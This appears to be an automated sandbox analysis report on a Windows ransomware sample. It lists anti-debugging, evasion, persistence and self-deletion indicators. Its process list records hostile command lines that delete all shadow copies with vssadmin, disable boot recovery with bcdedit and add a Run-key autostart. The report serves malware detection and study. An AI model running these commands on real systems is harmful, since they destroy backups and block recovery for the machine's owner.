Generates new code (likely due to unpacking of malware or shellcode)

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Code execution: Found new code
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Code execution: Found new code

PE file contains an invalid checksum

Show sources

Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Static PE information: real checksum: 0xed005e8b should be: 0x5151d
Source: amhfnhe45.exe.2732.dr	Static PE information: real checksum: 0xed005e8b should be: 0x5151d

PE file contains sections with non-standard names

Show sources

Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Static PE information: section name: .data5
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Static PE information: section name: .data4
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Static PE information: section name: .data1
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Static PE information: section name: .data3
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Static PE information: section name: .data2
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Static PE information: section name: .data6
Source: amhfnhe45.exe.2732.dr	Static PE information: section name: .data5
Source: amhfnhe45.exe.2732.dr	Static PE information: section name: .data4
Source: amhfnhe45.exe.2732.dr	Static PE information: section name: .data1
Source: amhfnhe45.exe.2732.dr	Static PE information: section name: .data3
Source: amhfnhe45.exe.2732.dr	Static PE information: section name: .data2
Source: amhfnhe45.exe.2732.dr	Static PE information: section name: .data6

Spreading:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Code function: 0_2_00413AB0 FindFirstFileW,FindNextFileW,FindClose,	0_2_00413AB0
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Code function: 0_1_00413AB0 FindFirstFileW,FindNextFileW,FindClose,	0_1_00413AB0
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Code function: 1_2_00413AB0 FindFirstFileW,FindNextFileW,FindClose,	1_2_00413AB0
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Code function: 1_1_00413AB0 FindFirstFileW,FindNextFileW,FindClose,	1_1_00413AB0

Contains functionality to query local drives

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

Code function: 0_2_00413840 GetLogicalDriveStringsW,GetVolumeInformationW,GetDriveTypeW,GetVolumeInformationW,ExitThread,

0_2_00413840

Enumerates the file system

Show sources

Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	File opened: C:\Documents and Settings\admin\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	File opened: C:\Documents and Settings\admin\AppData\Local\Adobe\Acrobat\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	File opened: C:\Documents and Settings\admin\AppData\Local\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	File opened: C:\Documents and Settings\admin\AppData\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	File opened: C:\Documents and Settings\admin\AppData\Local\Adobe\Acrobat\11.0\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	File opened: C:\Documents and Settings\admin\AppData\Local\Adobe\

System Summary:

Classification label

Show sources

Source: classification engine

Classification label: mal76.evad.rans.phis.spyw.troj.winEXE@20/232@15/6

Contains functionality to adjust token privileges (e.g. debug / backup)

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Code function: 0_2_004201F0 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,	0_2_004201F0
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Code function: 0_1_004201F0 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,	0_1_004201F0
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Code function: 1_2_004201F0 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,	1_2_004201F0
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Code function: 1_1_004201F0 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,	1_1_004201F0

Contains functionality to enum processes or threads

Show sources

Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe

Code function: 1_2_0041C8F0 GetVersionExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,Process32Next,GetTickCount,GetTickCount,Thread32First,Thread32Next,GetTickCount,GetTickCount,Module32First,Module32Next,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,

1_2_0041C8F0

Contains functionality to instantiate COM classes

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

Code function: 0_2_0041F040 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,SHGetFolderPathW,SHGetFolderPathW,CoCreateInstance,ExitProcess,CoCreateInstance,ExitProcess,LoadLibraryW,LoadStringW,LoadStringW,LoadStringW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetSpecialFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,GetModuleFileNameW,DeleteFileW,LookupPrivilegeValueA,GetLastError,GetVersionExW,CreateThread,SetThreadPriority,

0_2_0041F040

Creates files inside the user directory

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

File created: C:\Users\admin\AppData\Roaming\amhfnhe45.exe

Creates temporary files

Show sources

Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe

File created: C:\Documents and Settings\admin\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Low\help_recover_instructions+uuk.txt

Found command line output

Show sources

Source: C:\Windows\System32\reg.exe	Console Write: ...........v..0.....T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.............N...........x...
Source: C:\Windows\System32\bcdedit.exe	Console Write: ...........v........T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.............N..........w.e.w
Source: C:\Windows\System32\vssadmin.exe	Console Write: .......................................v..0..................\|..............................,...............S<..........
Source: C:\Windows\System32\vssadmin.exe	Console Write: ....................N.o. .i.t.e.m.s. .f.o.u.n.d. .t.h.a.t. .s.a.t.i.s.f.y. .t.h.e. .q.u.e.r.y.......4...P...S<..........
Source: C:\Windows\System32\bcdedit.exe	Console Write: ...........v........T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.............N..........w.e.w
Source: C:\Windows\System32\bcdedit.exe	Console Write: ...........vd.......T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.............N..........w.e.w
Source: C:\Windows\System32\bcdedit.exe	Console Write: ...........v..$.....T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.......$...$.N..........w.e.w
Source: C:\Windows\System32\bcdedit.exe	Console Write: ...........v........T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........T...N..........w.e.w

PE file has an executable .text section and no other executable section

Show sources

Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Reads software policies

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Spawns processes

Show sources

Source: unknown	Process created: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: unknown	Process created: C:\Users\admin\AppData\Roaming\amhfnhe45.exe
Source: unknown	Process created: C:\Windows\System32\cmd.exe
Source: unknown	Process created: C:\Windows\System32\reg.exe
Source: unknown	Process created: C:\Windows\System32\bcdedit.exe
Source: unknown	Process created: C:\Windows\System32\vssadmin.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe
Source: unknown	Process created: C:\Windows\System32\bcdedit.exe
Source: unknown	Process created: C:\Windows\System32\bcdedit.exe
Source: unknown	Process created: C:\Windows\System32\bcdedit.exe
Source: unknown	Process created: C:\Windows\System32\bcdedit.exe
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Process created: C:\Users\admin\AppData\Roaming\amhfnhe45.exe C:\Users\admin\AppData\Roaming\amhfnhe45.exe
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL C:\94-61F~1.EXE
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Process created: C:\Windows\System32\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v game342 /t REG_SZ /d C:\Users\admin\AppData\Roaming\amhfnhe45.exe /f
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} bootems off
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Process created: C:\Windows\System32\vssadmin.exe C:\Windows\System32\vssadmin.exe delete shadows /all /Quiet
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} advancedoptions off
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} optionsedit off
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} recoveryenabled off

Uses an in-process (OLE) Automation server

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E436EBB3-524F-11CE-9F53-0020AF0BA770}\InprocServer32

Creates mutexes

Show sources

Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe

Mutant created: \Sessions\1\BaseNamedObjects\12393578327533451

Reads the hosts file

Show sources

Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe

File read: C:\Windows\System32\drivers\etc\hosts

Sample file is different than original file name gathered from version info

Show sources

Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Binary or memory string: OriginalFilename vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Binary or memory string: OriginalFilenameTODO: <Original filename>J vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Binary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Binary or memory string: OriginalFilenameQ-Dir.exe vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Binary or memory string: OriginalFilenameMMDevAPI.Dll.MUIj% vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Binary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Binary or memory string: OriginalFilenamewdmaud.drv.muij% vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Binary or memory string: System.OriginalFileName vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Binary or memory string: originalfilename vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Binary or memory string: OriginalFilenameQ-Dir.exe vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

Sample reads its own file content

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

File read: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

Uses reg.exe to modify the Windows registry

Show sources

Source: unknown

Process created: C:\Windows\System32\reg.exe

PE file contains more sections than normal

Show sources

Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Static PE information: Number of sections : 11 > 10
Source: amhfnhe45.exe.2732.dr	Static PE information: Number of sections : 11 > 10

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to create a new security descriptor

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

0_2_0041F040

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: amhfnhe45.exe	Binary or memory string: Progman
Source: amhfnhe45.exe	Binary or memory string: Program Manager
Source: amhfnhe45.exe	Binary or memory string: Shell_TrayWnd

Contains functionality to launch a program with higher privileges

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

Code function: 0_2_0041E880 GetEnvironmentVariableW,ShellExecuteExW,ShellExecuteExW,GetLastError,Sleep,GetLastError,Sleep,ShellExecuteExW,CloseHandle,

0_2_0041E880

Anti Debugging:

Contains functionality to register its own exception handler

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Code function: 0_2_0042C13E SetUnhandledExceptionFilter,	0_2_0042C13E
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Code function: 0_2_004256FE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_004256FE
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Code function: 0_2_00426F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00426F58
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Code function: 0_1_0042C13E SetUnhandledExceptionFilter,	0_1_0042C13E
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Code function: 0_1_004256FE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_1_004256FE
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Code function: 0_1_00426F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_1_00426F58
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Code function: 1_2_0042C13E SetUnhandledExceptionFilter,	1_2_0042C13E
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Code function: 1_2_004256FE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_004256FE
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Code function: 1_2_00426F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00426F58
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Code function: 1_1_0042C13E SetUnhandledExceptionFilter,	1_1_0042C13E
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Code function: 1_1_004256FE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_1_004256FE
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Code function: 1_1_00426F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_1_00426F58

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

System information queried: KernelDebuggerInformation

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

Code function: 0_2_004256FE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_004256FE

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Show sources

Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe

1_2_0041C8F0

Contains functionality to dynamically determine API calls

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

0_2_0042D4E5

Contains functionality to read the PEB

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Code function: 0_2_001A0000 mov eax, dword ptr fs:[00000030h]	0_2_001A0000
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Code function: 0_2_001A0000 mov ecx, dword ptr fs:[00000030h]	0_2_001A0000
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Code function: 0_2_001A0408 mov eax, dword ptr fs:[00000030h]	0_2_001A0408
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Code function: 1_2_00170000 mov eax, dword ptr fs:[00000030h]	1_2_00170000
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Code function: 1_2_00170000 mov ecx, dword ptr fs:[00000030h]	1_2_00170000
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Code function: 1_2_00170408 mov eax, dword ptr fs:[00000030h]	1_2_00170408

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

Code function: 0_2_00413E50 GetProcessHeap,GetFileAttributesW,SetFileAttributesW,CreateFileW,GetFileSize,HeapAlloc,ReadFile,CloseHandle,HeapFree,CloseHandle,HeapFree,HeapFree,CloseHandle,HeapAlloc,HeapFree,HeapFree,HeapFree,CloseHandle,SetFilePointer,WriteFile,HeapFree,HeapFree,HeapFree,CloseHandle,WriteFile,WriteFile,FlushFileBuffers,CloseHandle,MoveFileExW,GetLastError,DeleteFileW,Sleep,HeapFree,HeapFree,HeapFree,

0_2_00413E50

Enables debug privileges

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Process token adjusted: Debug
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Process token adjusted: Debug

Malware Analysis System Evasion:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Code function: 0_2_00413AB0 FindFirstFileW,FindNextFileW,FindClose,	0_2_00413AB0
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Code function: 0_1_00413AB0 FindFirstFileW,FindNextFileW,FindClose,	0_1_00413AB0
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Code function: 1_2_00413AB0 FindFirstFileW,FindNextFileW,FindClose,	1_2_00413AB0
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Code function: 1_1_00413AB0 FindFirstFileW,FindNextFileW,FindClose,	1_1_00413AB0

Contains functionality to query local drives

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

Code function: 0_2_00413840 GetLogicalDriveStringsW,GetVolumeInformationW,GetDriveTypeW,GetVolumeInformationW,ExitThread,

0_2_00413840

Queries a list of all running processes

Show sources

Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe

Process information queried: ProcessInformation

Checks the free space of harddrives

Show sources

Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Show sources

Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe

1_2_0041C8F0

Enumerates the file system

Show sources

Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	File opened: C:\Documents and Settings\admin\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	File opened: C:\Documents and Settings\admin\AppData\Local\Adobe\Acrobat\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	File opened: C:\Documents and Settings\admin\AppData\Local\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	File opened: C:\Documents and Settings\admin\AppData\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	File opened: C:\Documents and Settings\admin\AppData\Local\Adobe\Acrobat\11.0\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	File opened: C:\Documents and Settings\admin\AppData\Local\Adobe\

Found dropped PE file which has not been started or loaded

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

Dropped PE file which has not been started: C:\Users\admin\AppData\Roaming\amhfnhe45.exe

Found evasive API chain (may stop execution after checking a module file name)

Show sources

Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_1-16791
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_0-16978
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_0-16762

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe TID: 2764	Thread sleep time: -60000ms >= -60000ms
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe TID: 3192	Thread sleep count: 309 > 30
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe TID: 3192	Thread sleep time: -61800ms >= -60000ms
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe TID: 3196	Thread sleep count: 178 > 30
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe TID: 3196	Thread sleep time: -71200ms >= -60000ms
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe TID: 3216	Thread sleep time: -60000ms >= -60000ms
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe TID: 3216	Thread sleep time: -60000ms >= -60000ms
Source: C:\Windows\System32\vssadmin.exe TID: 3020	Thread sleep time: -60000ms >= -60000ms
Source: C:\Windows\System32\svchost.exe TID: 3084	Thread sleep time: -60000ms >= -60000ms

Accesses Audio hardware information via COM

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Key opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Key opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\TreatAs
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\TreatAs
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Key opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\Progid
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\Progid
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Key opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Key opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocServer32
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocServer32
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Key opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocHandler32
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocHandler32
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Key opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocHandler
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocHandler
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Key opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Key opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\TreatAs
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\TreatAs
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Key opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\Progid
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\Progid
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Key opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Key opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocServer32
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocServer32
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Key opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocHandler32
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocHandler32
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Key opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocHandler
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocHandler

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Process information set: NOOPENFILEERRORBOX

Extensive use of GetProcAddress (often used to hide API calls)

Show sources

Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

Code function: 0_2_0041C8F0 GetVersionExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,

0_2_0041C8F0

Deletes itself after installation

Show sources

Source: C:\Windows\System32\cmd.exe

File deleted: c:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

Lowering of HIPS / PFW / Operating System Security Settings:

Overwrites Mozilla Firefox settings

Show sources

Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe	File written: C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\help_recover_instructions+uuk.txt
